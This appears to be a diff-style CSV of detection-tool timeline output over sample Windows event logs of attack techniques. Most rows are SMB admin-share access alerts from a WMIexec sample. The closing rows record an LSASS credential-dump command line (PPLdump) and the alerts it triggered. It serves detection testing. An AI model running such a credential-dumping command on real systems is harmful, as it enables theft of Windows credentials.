+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Documents  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\SMB exec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\SMB exec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\SMB exec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\SMB exec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63565  :  LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63566  :  LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63567  :  LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP\DESKTOP.INI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PPLdump.exe  -v lsass lsass.dmp  :  Path: C:\Users\IEUser\Desktop\PPLdump.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v  :  Path: C:\Windows\System32\services.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: PPLdump.exe  -v lsass lsass.dmp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
